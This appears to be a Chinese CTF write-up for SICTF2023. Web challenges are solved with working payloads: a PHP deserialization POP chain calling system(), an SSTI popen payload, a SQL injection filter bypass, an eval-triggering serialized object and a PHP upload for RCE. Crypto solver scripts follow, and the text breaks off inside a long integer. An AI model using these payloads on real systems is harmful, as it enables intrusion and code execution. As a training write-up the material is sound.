SICTF2023 WP
前言
新年前的最后一场比赛。感谢shenghuo2师傅提供的misc和密码的wp，把misc和密码ak了，太强了。
web
兔年大吉
源码
<?php
// Challenge source: a deliberately vulnerable page that hands the `pop`
// query parameter straight to unserialize(). Every class below contributes
// one magic method to a property-oriented-programming (POP) chain.
highlight_file(__FILE__);
error_reporting(0);

// Holds a callable name ($cmd) and one argument ($content).
class Happy{
    private $cmd;
    private $content;
    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }
    // Runs for any undefined method called on this object. Both properties
    // are restored from the serialized input, so whoever supplies that input
    // chooses the function that runs and its argument.
    public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }
    // Runs when a Happy object is restored by unserialize().
    // NOTE(review): PHP also runs object destructors when a script ends
    // through die()/exit(), so stopping here presumably does not keep
    // Year::__destruct() from firing for objects restored in the same call —
    // confirm on the PHP version in use. __wakeup() is not a deserialization
    // guard.
    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}

// Invoking a Nevv object as a function calls check() on $happiness.
class Nevv{
    private $happiness;
    public function __invoke()
    {
        return $this->happiness->check();
    }
}

// Writing to an inaccessible property of Rabbit reads `family` from
// $aspiration.
class Rabbit{
    private $aspiration;
    public function __set($name,$val){
        return $this->aspiration->family;
    }
}

// Entry point of the chain: __destruct() runs without any explicit call.
class Year{
    public $key;
    public $rabbit;
    public function __construct($key)
    {
        $this->key = $key;
    }
    // Assigns to `wish` on $rabbit; Rabbit declares no such property.
    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }
    // Reading an inaccessible property discards the requested name and
    // calls $this->rabbit as a function instead.
    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }
    // Loose (==) comparison on a value that comes from the serialized input.
    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

// Root cause: request data is deserialized into arbitrary application
// classes. Outside a CTF, decode request data with json_decode(), or at
// least pass ['allowed_classes' => false] as the second argument of
// unserialize() so that no magic methods of these classes can run.
if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
}else {
    echo "过新年啊~过个吉祥年~";
}
我们要利用的是__call方法里的call_user_func函数。反序列化的入口只有__wakeup()和__destruct()：如果执行__wakeup()就会执行die()退出，所以从__destruct()进入。
进入后先满足if语句的条件 key == "happy new year"，执行firecrackers()；这个方法会给不存在的属性wish赋值，可以触发Rabbit中的__set；__set会return一个不存在的family属性，触发Year中的__get；__get会以调用函数的方式调用对象$name，触发Nevv中的__invoke；__invoke会调用不存在的方法check()，触发Happy中的__call；之后给cmd赋值就可以rce了。
链子：__destruct() –> __set() –> __get() –> __invoke() –> __call()
poc
<?php
// Local copy of the challenge classes, used to build the object graph and
// print its URL-encoded serialization. Differences from the challenge
// source: echo statements were added as trace markers, and
// Nevv::$happiness / Rabbit::$aspiration are declared public here (private
// in the challenge) so this script can assign them from outside the class.
highlight_file(__FILE__);
error_reporting(0);
class Happy{
    private $cmd;
    private $content;
    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }
    public function __call($name, $arguments)
    {
        // Trace marker: the chain reached __call.
        echo "到达call" ;
        call_user_func($this->cmd, $this->content);
    }
    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}
class Nevv{
    public $happiness;
    public function __invoke()
    {
        // Trace marker: the chain reached __invoke.
        echo "到达invoke" ;
        return $this->happiness->check();
    }
}
class Rabbit{
    public $aspiration;
    public function __set($name,$val){
        // Trace marker: the chain reached __set.
        echo "到达set";
        return $this->aspiration->family;
    }
}
class Year{
    public $key;
    public $rabbit;
    public function __construct($key)
    {
        $this->key = $key;
    }
    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }
    public function __get($name)
    {
        $name = $this->rabbit;
        // Trace marker: the chain reached __get.
        echo "到达get";
        $name();
    }
    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}
// Object graph: Year -> Rabbit -> Year -> Nevv -> Happy. The outer Year
// carries the key that __destruct() compares against.
$a = new Year('happy new year');
$a -> rabbit = new Rabbit();
$a -> rabbit -> aspiration = new Year('1');
$a -> rabbit -> aspiration -> rabbit = new Nevv();
$a -> rabbit -> aspiration -> rabbit -> happiness =new Happy('system','ls');
// urlencode() keeps the NUL bytes that mark Happy's private properties
// (visible as %00 in the output below) intact in a query string.
// NOTE(review): $a is also destroyed when this script ends, so the chain
// presumably runs locally as well — that is what the trace markers show.
echo urlencode(serialize($a));
//O%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7Bs%3A10%3A%22aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7Bs%3A9%3A%22happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7Bs%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3Bs%3A14%3A%22%00Happy%00content%22%3Bs%3A2%3A%22ls%22%3B%7D%7D%7D%7D%7D
注意要把Year中的key赋值为happy new year。另外因为Happy类中有private属性，序列化结果里带有不可见的%00字节，所以要url编码。
ezbypass
源码
<?php
// Challenge source: evaluates the POSTed `code` field as PHP when it passes
// a length limit and a character blacklist.
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST['code'])) {
    $code = $_POST['code'];
    // Length cap: at most 105 bytes.
    // NOTE(review): strlen() runs before the is_string() check below, so a
    // non-string value (e.g. an array from code[]=...) reaches strlen() first.
    if (strlen($code) <= 105){
        if (is_string($code)) {
            // Rejects input containing any ASCII letter or digit, or one of
            // @ # % ^ & * : { } - < ? > " | ` ~ \
            // A character blacklist does not make eval() on request data
            // safe: the remaining characters are still valid PHP syntax. The
            // only robust fix is not to evaluate request data at all.
            if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){
                eval($code);
            } else {
                echo "Hacked!";
            }
        } else {
            echo "You need to pass in a string";
        }
    } else {
        echo "long?";
    }
}
这题和ctfshow举办的rce大挑战基本一模一样，
直接看我的这篇博客即可：
https://blog.csdn.net/qq_63928796/article/details/127963079?spm=1001.2014.3001.5502
SSTI
f12看到参数是SI，用字典fuzz一下。
经过测试，242是被过滤掉的。
可以通过拼接来绕过过滤，构造payload就可以：
?SI={%print(""['__cl''ass__']['__bas''es__'][0]['__subcla''sses__']()[132]['__in''it__']['__glo''bals__']['po''pen']('cat ../ga1f').read())%}
ezphp
题目是一个登录框，有sql注入，过滤了空格和select，用双写绕过。
pass=1&user=-1'/**/ununionion/**/seselectlect/**/1'
成功登录admin页面
随便输一点可以看到源码
<?php
// admin.php as shown by the challenge: an "admin" page that fetches whatever
// the POSTed `url` field names and echoes it back.

// Restricts PHP file functions to the current directory.
ini_set('open_basedir',".");
// Report everything except notices and warnings.
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
// The admin check is a cookie compared (loosely, with !=) against the MD5
// of a fixed string. The expected value is the same for every visitor and
// is not tied to the session started above, so it works as a static shared
// secret rather than as authentication. A server-side session flag set at
// login, compared with hash_equals() where a token is needed, avoids this.
if($_COOKIE['admin']!=md5('adminyyds')){
    header('Location:/index.php');
    exit();
}
echo('<h1>WelCome!ADMin!!!</h1>');
echo('this is a site test pages for admin! ');
if(isset($_POST['url'])){
    // Request-controlled path or URL passed to file_get_contents() and
    // echoed: this discloses any file the open_basedir setting still allows,
    // including the PHP source of sibling scripts.
    // NOTE(review): whether remote URLs are fetched as well depends on
    // allow_url_fopen, which is not visible here.
    echo file_get_contents($_POST['url']);
    // Prints this file's own source, including the trailing comment.
    show_source(__FILE__);
}
else{
    echo('<form action="/admin.php" method="POST">
url:<input value="" name="url" type="text">
</form>
');
}
// The comment below names another script in the same directory.
//x9sd.php
?>
提示x9sd.php
去读取x9sd.php
post:url=x9sd.php
查看源码就可以看到x9sd.php的源码
// x9sd.php: deserializes the base64-decoded `unserx` query parameter.
class a {
    protected $cmd;
    // Echoes $cmd and then evaluates it as PHP when the object is destroyed.
    // $cmd is restored from the serialized input, so whoever supplies that
    // input chooses the code; the @ operator hides any eval() error.
    function __destruct()
    { echo $this->cmd;
        @eval($this->cmd);
    }
}
if(isset($_GET['username']) && isset($_GET['unserx'])){
    $var = base64_decode($_GET['unserx']);
    // Only prints a message; execution continues either way.
    if($_GET['username'] === "admin"){
        echo "nonono?";
    }
    // PHP has already URL-decoded $_GET values once; this decodes a second
    // time before the comparison.
    $username = urldecode($_GET['username']);
    if($username === "admin"){
        unserialize($var);
    }
    // NOTE(review): this second call sits outside the username check, so
    // the check above does not actually gate deserialization.
    // Root cause is unserialize() on request data; json_decode(), or
    // ['allowed_classes' => false] as the second argument, removes the
    // __destruct() gadget.
    unserialize($var);
    echo("success");
}else{
    echo "I need some ???";
}
意思就是通过反序列化直接触发__destruct()，之后调用eval函数进行rce，还要绕过两个简单的if语句。
poc
<?php
// Local copy of class `a` from x9sd.php, used to print a base64-encoded
// serialized instance. $cmd is declared public here (protected in x9sd.php)
// and given a default value.
error_reporting(0);
highlight_file(__FILE__);
class a {
    public $cmd = "system('ls')";
    function __destruct()
    { echo $this->cmd;
        @eval($this->cmd);
    }
}
$a = new a();
// base64 matches the base64_decode() applied to `unserx` on the server side.
echo base64_encode(serialize($a));
// Output of the line above:
//TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9
再把admin经过两次url编码后传入username
username=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65&unserx=TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9
ezupload
文件上传给了源码
<?php
// Challenge source: an upload handler that filters by file extension using a
// blacklist and stores the file under upload/ with a time-based name.
@error_reporting(0);
// date() below therefore returns Los Angeles local time.
date_default_timezone_set('America/Los_Angeles');
highlight_file(__FILE__);
// NOTE(review): $is_upload and $msg are never initialised before the
// branches below, so $is_upload is undefined when no form was submitted.
if (isset($_POST['submit'])){
    $file_name = trim($_FILES['upload_file']['name']);
    // Extension blacklist. The extension is lower-cased before the lookup,
    // so the mixed-case entries can never match, and the list has no plain
    // ".php" entry. An allowlist of expected extensions, combined with
    // storing uploads where they are not executed, is the robust form.
    $black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
    // Everything from the last dot of the client-supplied name.
    $file_ext = strrchr($file_name, '.');
    $file_ext = strtolower($file_ext);
    if (!in_array($file_ext, $black)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        // Stored name = HHMMSS + an integer in [114, 514] + the client's
        // extension. The time is observable and rand() offers 401 values,
        // so the name is not a secret; random_bytes() would be needed for
        // an unguessable one.
        $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错';
        }
    }else {
        $msg = '你传啥玩意';
    }
}
if($is_upload){
    echo '呀,传进去了欸~';
}
?>
主要是这一部分
if (!in_array($file_ext, $black)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;
他把传入的文件放到了upload目录下，文件名由date("His")（上传的时间）、rand(114,514)（114到514的随机数）再加上文件的后缀组成，而这个时间在开头被设置成了美国时间：
date_default_timezone_set('America/Los_Angeles');
这就是时间
再看这一串过滤
$black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
其实并没有过滤php，所以直接上传php文件即可。之后记住上传时的美国时间，再在bp中爆破rand(114,514)即可。
CRYPTO
Ascii
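import base64

# Obfuscated flag as handed out by the challenge.
flag = 'a$HVZDZQ@TJUMGLVHZIYUF1U0NNYDURWWDNM6FFYP1OA[TRPHWJZ7R>>>>$'

# Step 1: undo the per-character XOR with 3. The result is the text form of
# a bytes literal, i.e. it starts with b' and ends with '.
flag_ = ''.join(chr(ord(ch) ^ 3) for ch in flag)

# Step 2: drop the b'...' wrapper, Base32-decode, then Base64-decode.
decoded = base64.b64decode(base64.b32decode(flag_[2:-1]).decode()).decode()
print(decoded)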
hashgame
MD5再MD5
为了只爆一次写了个dict
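import string
from hashlib import md5

# One digest per flag character: md5(md5(char).hexdigest()).hexdigest().
flag_md5 = '''999a215b1f8372bb0f1c84c467a1506b
02b0b94ee1fa195ae7959560893f7e3c
297e7ca127d2eef674c119331fe30dff
65c162f7c43612ba1bdf4d0f2912bbc0
ed8a4ab0c0967b14e3bf6b145e153ec9
d24412e1ab190533176a653cef11b185
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
cd7fd1517e323f26c6f1b0b6b96e3b3d
a94837b18f8f43f29448b40a6e7386ba
dc0ae7e1387be9b795f5d6299e383759
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
011ecee7d295c066ae68d4396215c3d0
d7afde3e7059cd0a0fe09eec4b0008cd
39abe4bca904bca5a11121955a2996bf
a3655d5c04849a174d341b13d5cf5468
011ecee7d295c066ae68d4396215c3d0
28c8edde3d61a0411511d3b1866f0636
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
4c0d13d3ad6cc317017872e51d01b238
83be264eb452fcf0a1c322f2c7cbf987
4e44f1ac85cd60e3caa56bfd4afb675e
815e6212def15fe76ed27cec7a393d59
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
4e44f1ac85cd60e3caa56bfd4afb675e
ed108f6919ebadc8e809f8b86ef40b05
a94837b18f8f43f29448b40a6e7386ba
dcfcd07e645d245babe887e5e2daa016
665f644e43731ff9db3d341da5c827e1
83be264eb452fcf0a1c322f2c7cbf987
39abe4bca904bca5a11121955a2996bf
39abe4bca904bca5a11121955a2996bf
4c0d13d3ad6cc317017872e51d01b238
dc0ae7e1387be9b795f5d6299e383759
011ecee7d295c066ae68d4396215c3d0
5eccf232f5ebb3e780543372692fff18'''.split('\n')

# Lookup table digest -> character, built once over the printable ASCII set.
# Hashing one character at a time leaves only 100 possible inputs, which is
# why a single precomputed table reverses the whole list; a second MD5 round
# adds nothing to that.
md5_md5 = {
    md5(md5(ch.encode("utf-8")).hexdigest().encode("utf-8")).hexdigest(): ch
    for ch in string.printable
}

# Indexing (instead of .get) fails with a KeyError naming the digest if one
# is not in the table, rather than with a TypeError on None.
flag = "".join(md5_md5[digest] for digest in flag_md5)
print(flag)
# The write-up quotes SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb} as the result.
# NOTE(review): that string does not fit the list above - entries 7 and 12 are
# the same digest (815e62...), yet the quoted flag has '1' and 'a' in those
# positions - and the same string is quoted for baby_rsa, so it looks like a
# copy-paste. Trust the printed output.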
baby_rsa
N是234个素数的积
factordb分解一下 处理数据
import libnum
c = 44457399775772165283580795763046604956432217865936749114390645714446263790235445725770165521476841968764175721036280702731933849090719866149354613431301887740671003826556620460836983488011711209908075106260857650574672356032244606425941095128801765463716482316101398637519304864271794460829068714740938719022156283319142938782439784724450045931039355442034325311037568791297455084676548879770834712506552233840348850684727096270392080049993135041218143811167688449496243036317450681348089315258831745988434134987055263393540923865029931594717328162951158311497514418799360413513590684301435386737514918075848373373755748782672860711406169316940293554209702288482064854840802876490202123903888235028119047988176327629542924415737212649237787748145773301112682790682933658516724691338727523894513267588035437093188599375494920656327919129240066252636130803666175859640361767805549884909317548802917210333235914904622641997249853362378711924024129399688535136879208010081166848163897114124726692078532337827810846421365846926064892472698603597461932481745017020417072013702099809833423003201003030492
n = 157077292656328898849823499976497003976795705913326943955927601882559735301000546878663484930436631929909115065166613744548816622146802007640124796249330573411377703969505934904150600987843325674764620305047603408490558134670867673308099650843329640744997672015466571290660161290811275435569339606335117906571999000341133024698424364682800683662193063661214736762852739324479859236963365531207752799197178993887860855078852702337761399225640575281412171035871278933493943575572155382899938265639764715616686123949482372238288859715465115400317136714757882965887595246507450491169518000205087415380208167764110920711042584766805992237919576823121108078407699912757901788925718859790257450499775129521327827653298451904392241906547672843110356658889638496906522290674659574024024440113632175010053065452660076447040937842478007881589334096496073556056726805396937630799201696246079227214272205462258357482722478243481697053301054600954126539848778226175296162997813416634702496577009409960503948474494741296663849482119365434792563324547643352816519125305335959420429699475765642610737903235960423173
e = 0x10001
process = ['32771','33023','33071','33149','33343','33521','33863','33911','34123','34159','34231','34421','34499','34589','35089','35381','35831','35879','35969','36131','36523','36677','36871','37039','37159','37493','37691^2','37781','37951^2','37967','38219^2','38639','38821','38917^2','39019^2','39157','39343','39371','39703','39779','40087^2','40459','40471','40693','40867','41039','41161','41257','41263','41281','41387','41399','41443','41603','41771','41809','41863','41887','41941','42359','42373','42839','42899','43151','43207','43313','43391^2','43573','43613','43987','44087','44111','44207','44249','44281','44417','44491','44563','45077','45247','45281','45377','45943','45959','46147','46219','46439','46559','46853','47111','47681','47777','47857','47911','48259','48437','48479','48497','48593','48947','49103','49177','49193','49199','49363','49663','50047','50147','50261','50359','50383','50539','50833','51001','51109^2','51437','51593','51749','51787','52201','52379','52453','52769','52879','52937^2','53147','53717','53731','53917','53987','53993','54217','54311','54347','54377','54437','54469','54833','55049^2','55147^2','55249','55259','55291^2','55381','55457','55541','55661','55793','55967','56131','56149','56359','56501','56843','57037','57047','57131','57139','57413^2','57487','57571','57637^2','57803','57853','58057','58099','58147','58427','58537','58543','58679','58963','58991','59159','59333','59377','59417^2','59539','59611','59723','59743','59833','59879','59929','60029','60413','60427','60509','60679','61211','61379','61403','61781','61861','61991','62039','62297','62467','62581','62617','62683','63073','63149','63277','63331','63439','63659','63799^2','63839','63929','64217^2','64433','64679','64781','65239','65293','65497']
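# Collect the factors of phi(n) from the factordb output in `process`.
# Each entry is a prime written in decimal, optionally followed by "^k";
# phi(p**k) = p**(k-1) * (p-1), so a plain prime contributes p-1 and a
# squared one contributes p-1 and p.
n_primes = []
for a in process:
    base, _, exponent = a.partition('^')
    prime = int(base)
    power = int(exponent) if exponent else 1
    n_primes.append(prime - 1)
    if power > 1:
        n_primes.append(prime ** (power - 1))

phi_n = 1
for i in n_primes:
    phi_n *= i

# With phi(n) known the private exponent follows directly. A modulus built
# from 16-bit primes is fully factorable, whatever the number of factors.
d = libnum.invmod(e, phi_n)
m = pow(c, d, n)
print(libnum.n2s(m))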
# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}
PolyRSA
可以知道
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p * q
算一下可以知道
n == 18*k^11 + 9*k^10 - 20*k^9 + 396*k^8 - 2628*k^7 + 45494*k^6 + 710128*k^5 + 350749*k^4 + 281190*k^3 - 7079507*k^2 - 6323570*k + 1867478411
由于 k = getRandomNBitInteger(64)
所以 k = libnum.nroot(n//18,11)
import libnum
n = 2931835714514227696649197851452018066969814603905505893064829694548691616628661422451386639398824072768907608195113790730392677411502544741840786734616614308622423513064577929715025601090611378413475093510051291
c = 1162375069210804266034094584942794481470301602122091344590668656120128936761168164673823514232328715217241524062023457713973727518007443604233760475552174214966591823835585191443465256735930086309706593996639864
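# n = 18*k**11 + lower-order terms and k is a 64-bit integer, so the integer
# 11th root of n//18 recovers k.
k = libnum.nroot(n//18, 11)
e = 0x10001
# Same polynomials as in the challenge.
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
# Verify the recovered factors against the given modulus instead of
# overwriting n with p*q, which would hide a wrong root.
if p * q != n:
    raise ValueError("recovered k does not reproduce n")
phi_n = (p-1)*(q-1)
d = libnum.invmod(e, phi_n)
m = pow(c, d, n)
print(libnum.n2s(m))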
RRRSSSAAA
hint是dp泄露，先解hint
import libnum
import gmpy2
e= 65537
n= 154243858720978602820118866455277758287334223654318945323956633685668127012462551649034724900534326698546179107853501584676890290935304784613676008667655919749627682648852472398117930471389759979432279103098572267738634433626627146280660185675121614094399255782089060202532182667463993275434746386786808729553
dp= 414447829724187823397808703878958757693775250832414113550357728233230359464880433113636330432984183165483109337095394192757735932571515450285102727598243
c= 107353143319003715532284973064969905174389167949274067058206046773012002421251301189097709121034091973243342582216724329271495555062882075119176838856174054763892910473175610614629226628025470613930226188506099489500606701109022668507012376482339056160636468427364776216626364765166621843217027512464383836160
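# dp = d mod (p-1), hence e*dp - 1 = i*(p-1) for some 1 <= i < e.
# Try every i; only exact divisors can give a valid p.
for i in range(1, e):
    if (dp * e - 1) % i:
        continue
    p = (dp * e - 1) // i + 1
    if n % p == 0:
        q = n // p
        break
else:
    # Without this the script would continue with an undefined q.
    raise ValueError("no factor of n recovered from dp")
print(p)
print(q)
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
print(m)
hint = libnum.n2s(int(m)).decode()
print(hint)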
得到 Alpha == 8
p = getPrime(512)
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)
n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2
gen_num函数相当于nextPrime函数所以把n中的qrs近似替换为p来表示
n = p**8 * (p*8)**(16) * ((p*8)*16)**(32) * (((p*8)*16)*32)**2
n=127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336*p^58
所以p近似等于 libnum.nroot((n0//root),58)
然后求一下上一个最近的素数
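def prePrime(x):
    """Return the largest prime strictly below x.

    Mirror image of the challenge's gen_num (next prime above x).
    Raises ValueError for x <= 2, where no smaller prime exists and the
    search would otherwise never terminate.
    """
    if x <= 2:
        raise ValueError("no prime below 2")
    x -= 1
    while not isPrime(x):
        x -= 1
    return x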
p = prePrime(libnum.nroot((n0//root),58))
然后按照原方法推算发现n正确
import gmpy2
import libnum
from Crypto.Util.number import *
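def gen_num(x):
    """Return the smallest prime strictly greater than x (next-prime search)."""
    x += 1
    while not isPrime(x):
        x += 1
    return x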
def prePrime(x):
    """Return the largest prime strictly smaller than x by stepping down one at a time."""
    x -= 1
    while not isPrime(x):
        x -= 1
    return x
n0 = 510598540378970007468346322989879190780475356832709189528874695730531468123747091318830966440138615736420891392158097533731041150162690662471483619765171875053776526546923686545162088172326434280369545887080098691661618888498451216122577703462656147845476260802989936275927468143618457014875124540773380472942489037761179303561650189545290190421786318533073909424735517884608967725919128200358535113829753453601297612782921831305721998858231417374167746154206561475003022801732102170674160043866579234096945753255309604584663823273990392197858273029361669185072049422597132579136784027822968387907216366150999438414498332890674564920800382005582891491049365978733797356415518435343495821039314228388769356638637099572998812062355774848959446125701462950655806332002764535951282449862140062574418031213788534096501985200284615865248974807525604893147298611402252296159828500266098282909607218395957805357667923653409828275804406466185333491486073920384298557332939701611488655278812282652143513835104674009767479927241052662403578967182673338296967573503287747778401579267126898937724971226916836862238412923209155792382534204896050548824028658237640251964366961727999178646613907934616655737902329568420682808750546571786374023614255135110482419627491157502417864563832543812083026753673687664854910877686333766643694031564516722983669199704788291656757271915091399977189663329054202997146978631991467923388119989473941572476162990901960011968892272676827771256008656450296183884491251752111424531449198118292179798490440493223653950102915889401116251591885909790869073018774674246846164536910633015902964911907187085243240032540938841961345835517368130042501382327926289017383981908729734129193302049155793436988510517701765733605569135643208447952662352778482137713239592896997102366230279153456455232519301534222340901671138239539845240151878610363390683459663471954623868659324304077587611084188341121303918876492043578883059738615210439439368338460631574255417822627815523601923537626576677
00408501787586092880276217647781528484093695114217653276851772863656225624066840952518488614280180282545146544099345702277107795709422895759212231968221629450933826273987216348297250899170252528936110597157465912612729623324790550549652568381771136670474661702774488941390468486757708166713718762382534941022938948419960873986422103598527768130738993984840579029447387862209220083775316110169553994751461472769995220011454436205187393850559146924046537909137783729756132329739351815252451394829447577077487259660134552646959048603738676796481263161822452723385081890934600744975677970731960991512761882855191068142164730718039963285724886765583689496813445762298795478168566483395177498138391401342072463767678790749849061986548870654242214133875493347619031365353073982202970021785753424347368058515026352394789150134144137196543585147967088220299295593527993365235633627025159132462389809498411919075277523600505740525794503803138286751182217312200130950572852659689392644529171203511755363758919029281600177055412984032683288870754199945479165374264787969458532911269738215144792369177080932780766537601411455262628528929180803284554490535638049722762273874630768561114048387517783951192297765704568035372367279241166148924216264627210564997035913427749990720790614957329999003385894321580195412644869346010277541822529325540275815943194381187237368205316094488777537546597143232096455494737731855451827585430309942099999269099091680175718485384747437962117797692668197737192219172208516491043003217732095434198698452359458317247060974397024581096985851263259794372162816572432944751682315938773422028251018595976823963001716211507275841917705657178107514837482272189968372048835604109624856388054775271028915151260708703831064923561068825505918246796437954413407076664686381577557604910633795534515005515181302853469006677110418841829644006730335541721082944097885859930648736162672393288367540470531964987763128946554759722590893442030486704834169830894043637737558890546354919956880078813032465
30743988910972239583927035151809584667713955665679236304408819867811200627693279931371517831898115707143912641550608407310294665934058537218339713038218041043828006736317867297447791653714332112673610248965760315569797710076932151985472965822351675821064197795806932252116952154065400254681412352411683875279018517749938670557406928359311153126595007137016529058023579519932909790991701591670091065340012268595338360828012299973379669725791865487711690996466561728824240894512730212938210261732106650957828027098749466419621155258413253003185246653865114216628604906208195613381106237748423403800689224156091373584488991265532798949506048718892085798867789991744055821605764795543242088760820339120317370862481218993037307814981565972498039271422354446444813880644861554319120036410956749499034041768108663075715313896377941478710129041346535693884936524414327590923367522289397641103970298313878039433948115583861228395681589284610075782599687657270925770065882648679604864720144937746640814071867213518528835271457905752422856646593039488422287665542439666913964923911525818300221338144541962599686557353617759147053322588929546142722444525184492604893485044492044614189717680113843402732912320941765722328370386704678538976658778514349925574290175042293377784700808934494234054916075876354383314765729962014826335872714790019157681823368134174601452729107804200627730572893521270586060484283151856245545511721521063544452405903801407563552263768294430681906723297768321121733220111378625905487216760593983796949945227944747745345795461096776152576967039504973328242995760691963302716664597584305420519690936808467656616854895564798250155054605855773883000050302405144486177152766008742906644168881845571425422070298270163626869248837043978741294122679494167334920808433155199129430480418806654426645349803706890812669084970510772371882217520590589128356176356910618044810359083177652799372175914326328326788064303813253400008989586804686941829931892080394597123914924101233868843405046482968159169
80264240229859574883155040793388439699245314010536014311134726579595932201351264754211113984594974123575279085420654342347792446273359397655783349850267895960713020361459104930811498666622216299579774939159380045958811891996366190154624989040001455252320159516822116133341010157165599727635333348456688307169980804760876207246783116588952529877373514768545007418968307885769960168050996962066803264260375707466369627458024513973771207018864983698407016663019106354023164759250846073414341438963394719456500998324900154652118420207057668806120330181700845296117532235012372135050553397046174401449323031309344766628888675704109715329046692002106076405553528413866402862565543443907259825033515101841485790388106868972724754988229771779715569516295419556055234476868558577442887306482605945053829666543946452255290321024138948999088611233226734197091325915223296133751626031378197131875533631358612215053149934608672729194446883476706267066475008836864936670808320239466055935088929279252129128009704233352664523535820092988950793050907265677092793104426094212209504897403359406325045852228354350509453013015487815230129380079713113632363881496974185547766115624580099624722897692297760495094913178120692467666707678647081180656345151015995338390986674404981831649353833607305738823436744297628382797810952028446046016233612873716789383675779820186248250486000672269630344269347652027789034023080859790238772676504723029078903218723114249502157501775936110552413022658586833869562215506206204712447588632398550497708640229614956652263449460598992811393334042395804931240940416629178335447861485028284981615219874331354750385150254017244750993573994159458909546341067039268159319391512934162794663414200907868505060542602841564239761181077333990423542820064315891665379550720216448942932714180923613869070005330476506812100063599659432570925437054287120906048730323556681557905787470647037629769660028387819741611799183349496549168370221978146678987457271259655273299546276899538032070218474555442304430
064164467753804089753466882786069297036926063093020795423414152340563079346797084488827259011515774643776620378827875819192074121522712821147817374988804339999134520633699074448564057555026364304855373068414955699295158212425760345481057281658337956841137897162198027254556350868502178340964817530029135654659162400076087528650997151875596189190736466304722028587441680622878918057024286243448077104494316372739218635221411755498456912672491099154558604384574583302548226057069534004474532514444674565766058970748694657151540644416463532338966570743112669782840065402131461088637463019996192189423665651801811614499041923273110971446683450048861113332787126098622974613883291506736280588039145040361795192519576202306796277888696719887642051327259799873478040156450250036778305950744573270786882726162630115640020293415918210448873867037875790399234972055537649774407094382744621251926131880807765203843946682834221238903263352845265134368550124026502981782369374484091775137498831749984649699756860976525160646445060537001
